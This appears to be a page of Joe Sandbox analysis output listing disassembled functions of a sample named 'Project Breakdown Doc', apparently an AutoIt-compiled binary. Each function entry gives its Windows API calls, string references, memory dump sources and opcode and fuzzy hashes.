                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: e8448dcdfa873e59a2e003fbade2a09bbcb5ff864a7fcaa54b8e7f6a591fa448
                                                  • Instruction ID: 0151a88146c2338225b07f270e6e931ebb4ac776c42826f853134148651aa01d
                                                  • Opcode Fuzzy Hash: e8448dcdfa873e59a2e003fbade2a09bbcb5ff864a7fcaa54b8e7f6a591fa448
                                                  • Instruction Fuzzy Hash: D8310931A00326ABEB248F8CC885B9EBBB5FF06309F140029E995D62A0D7709A80DB50
                                                  Function 00CC6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CC69D0
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC69DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 53b4ad224443d626c59537097a409b4817f7f6e1159338604a374ee3f5c50645
                                                  • Instruction ID: 4782a04326c1e012bfdbe8807de334dfcccc581e14023c2f9e51aafc47015681
                                                  • Opcode Fuzzy Hash: 53b4ad224443d626c59537097a409b4817f7f6e1159338604a374ee3f5c50645
                                                  • Instruction Fuzzy Hash: F111C4717002086FEF119F24CD80FBF776EEB893A4F110129F96897290D6719D9187A0
                                                  Function 00CC6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C41D73
                                                    • Part of subcall function 00C41D35: GetStockObject.GDI32(00000011), ref: 00C41D87
                                                    • Part of subcall function 00C41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C41D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00CC6EE0
                                                  • GetSysColor.USER32(00000012), ref: 00CC6EFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: c7918c8f76c40d70e080525f8797d222d3bc5a9dfbc2e9f0dc5909b0279d2a29
                                                  • Instruction ID: 4197398350d28cb3ab47faa5f331d337ba9cc94db1410a632e7a937f8b6618de
                                                  • Opcode Fuzzy Hash: c7918c8f76c40d70e080525f8797d222d3bc5a9dfbc2e9f0dc5909b0279d2a29
                                                  • Instruction Fuzzy Hash: C821E472A1020AAFDB04DFA8DD45FEA7BA9FB08314F04462DF955D2250E635E8619B60
                                                  Function 00CC6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00CC6C11
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CC6C20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: eef1c89b02bc4dde7c53f473ceee68ec66a0915f28fb973c98ad42103b731dd7
                                                  • Instruction ID: 8db80831c8a4981f4a3bb24c6d7d5d270c44509e4015237b6081de27b8099e06
                                                  • Opcode Fuzzy Hash: eef1c89b02bc4dde7c53f473ceee68ec66a0915f28fb973c98ad42103b731dd7
                                                  • Instruction Fuzzy Hash: 44116671500208ABEB108F64DE91FEA3BAAEB04378F204728F975D71E0C775DC91AB60
                                                  Function 00CA2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2F11
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CA2F30
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 75541cad306a02e29fcc4a217dbe5dfc95306a552f66ff67ebb40526de51a539
                                                  • Instruction ID: a420f0b4d5af1c9bc2db293bc81c201e2be0c6b601abecf3b112339647b5ffa3
                                                  • Opcode Fuzzy Hash: 75541cad306a02e29fcc4a217dbe5dfc95306a552f66ff67ebb40526de51a539
                                                  • Instruction Fuzzy Hash: D311B635905236AFDB20DB9CDC44B9977B9EB06318F1840A5E864E72A0D7B0EE04C7A5
                                                  Function 00CB24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CB2520
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CB2549
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: 3161dd765754b0c68cd2b75324f77250ef17888ced87b70ddd096d39278b4897
                                                  • Instruction ID: 08e5c17ac6637fa53781a2ba976651ce8f138e076b36c3c497c1c0b934510ab2
                                                  • Opcode Fuzzy Hash: 3161dd765754b0c68cd2b75324f77250ef17888ced87b70ddd096d39278b4897
                                                  • Instruction Fuzzy Hash: EF11A0B0541225BADB349F528C99FFBFF68FB06751F10822AF91556040D2706A59DAE0
                                                  Function 00CB80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00CB830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00CB80C8,?,00000000,?,?), ref: 00CB8322
                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB80CB
                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00CB8108
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 2496851823-2422070025
                                                  • Opcode ID: 529adb535c8ba72e9d86985f4703c8c12064139f76d73204af54801ac3f23704
                                                  • Instruction ID: d0e028635687b962f1075ea85fa34d96d67898e796c080922b4b09cda714bd17
                                                  • Opcode Fuzzy Hash: 529adb535c8ba72e9d86985f4703c8c12064139f76d73204af54801ac3f23704
                                                  • Instruction Fuzzy Hash: AF11A574500205ABDF10AF64DC46FFDB379FF04360F10852AE911972D1DB71A915D795
                                                  Function 00C992E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C99355
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: aaadeafa3cb91df2dcc1b2244107872e155f8621c17fedc9e4bd7cc584576c6b
                                                  • Instruction ID: 419e47faf20c6bf2a09eb1519e39dc03b90c31470c436b39449daace24695472
                                                  • Opcode Fuzzy Hash: aaadeafa3cb91df2dcc1b2244107872e155f8621c17fedc9e4bd7cc584576c6b
                                                  • Instruction Fuzzy Hash: 9E019E71A05218AB8F04EFA4CC969FE7769FF06320B14071DF972572E2DB31690CA751
                                                  Function 00CA901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: a0b6dd584ddb175c11502548e9c3a9d2d771c7f7cb2a553f841bd8f3a70c3c16
                                                  • Instruction ID: e5f3145c0b54135d0afad41e6bc8ffb1af709d201bc705af09041954c6f09df1
                                                  • Opcode Fuzzy Hash: a0b6dd584ddb175c11502548e9c3a9d2d771c7f7cb2a553f841bd8f3a70c3c16
                                                  • Instruction Fuzzy Hash: 2D01F9718042186EDB28C7A8CC56EFEBBF8DB05301F00419AF552D2181E575A6049760
                                                  Function 00C991DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C9924D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: b7aaeb9b99e5aef4cedc5648e6c9ce74cbad55baf8fabf48e9bc31655e8d9c5a
                                                  • Instruction ID: 205bb325fe33b2e04a2a806ae75a43092336200168cdb97b38e4520b321619b1
                                                  • Opcode Fuzzy Hash: b7aaeb9b99e5aef4cedc5648e6c9ce74cbad55baf8fabf48e9bc31655e8d9c5a
                                                  • Instruction Fuzzy Hash: 280184B1A411087BCF14EBA4C996EFF77ACEF55300F14012DB912672C2EA216F1CA672
                                                  Function 00C99264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C992D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: a4d4f39c8f7cfd2cfe561f2a30d32a820a737f25301b0bd888d395561ab1deb7
                                                  • Instruction ID: 9a89b53b35c2fa25621e5f3c27383acf8e8e0acbfa1e13e74d944ebce52bee32
                                                  • Opcode Fuzzy Hash: a4d4f39c8f7cfd2cfe561f2a30d32a820a737f25301b0bd888d395561ab1deb7
                                                  • Instruction Fuzzy Hash: 510162B1A4121877DF04EBA4C986EFF77ACEF15300F240129B952672D2DA215F1CA676
                                                  Function 00CA51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: 102c61ee86facb861f0a62c3361699a551ff5dac37c0b37bd7697b7bba5bb0e6
                                                  • Instruction ID: f237ba27db1688dc5ac2593a3ba686078673dbba86533d57aec1830d0db9fa41
                                                  • Opcode Fuzzy Hash: 102c61ee86facb861f0a62c3361699a551ff5dac37c0b37bd7697b7bba5bb0e6
                                                  • Instruction Fuzzy Hash: 6BE0D872A0432D2BE7209B99EC49FA7FBACEB45771F00016BFD18D7150E570AA458BE1
                                                  Function 00C981BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C981CA
                                                    • Part of subcall function 00C63598: _doexit.LIBCMT ref: 00C635A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: a70f858800192b67dfeeb842d8ce784ab639163a3a081d82b1641b6cead1bec1
                                                  • Instruction ID: d189b4dec3f3cffaee385bd52ad71301e1b257d308df07cd51452e52fbf24b99
                                                  • Opcode Fuzzy Hash: a70f858800192b67dfeeb842d8ce784ab639163a3a081d82b1641b6cead1bec1
                                                  • Instruction Fuzzy Hash: DDD05B323C535832D62433A46C0BFCD79488B15B52F144426FF08965D38DD1599262D9
                                                  Function 00C7B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C7B564: _memset.LIBCMT ref: 00C7B571
                                                    • Part of subcall function 00C60B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C7B540,?,?,?,00C4100A), ref: 00C60B89
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00C4100A), ref: 00C7B544
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C4100A), ref: 00C7B553
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C7B54E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: bc688c11279a9bc04e529ba32e647e344434e9e431fc35aaa6f5a096a47baafa
                                                  • Instruction ID: f30732ba83c7fea912f353e41b4abdd615dc168d3af8423d44ed893242cb0e89
                                                  • Opcode Fuzzy Hash: bc688c11279a9bc04e529ba32e647e344434e9e431fc35aaa6f5a096a47baafa
                                                  • Instruction Fuzzy Hash: C2E092B02007518FD760DF69E5047467BE4BF00709F04C92CE48AC3760DBB4D845CBA1
                                                  Function 00CC5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC5BF5
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CC5C08
                                                    • Part of subcall function 00CA54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA555E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 4c7e26a25c58053e8198f4c772a127eaf46af3b32837489dfbab7269c585e050
                                                  • Instruction ID: df0524edb8c9a1fb2d36b3cc1000fa3e485cccd81e9fbe3e1baf3a93c9fdc042
                                                  • Opcode Fuzzy Hash: 4c7e26a25c58053e8198f4c772a127eaf46af3b32837489dfbab7269c585e050
                                                  • Instruction Fuzzy Hash: E1D01231388311B7E774BB70EC0FFEB6A25AB05B51F014839F749AA1D0D9E45801C654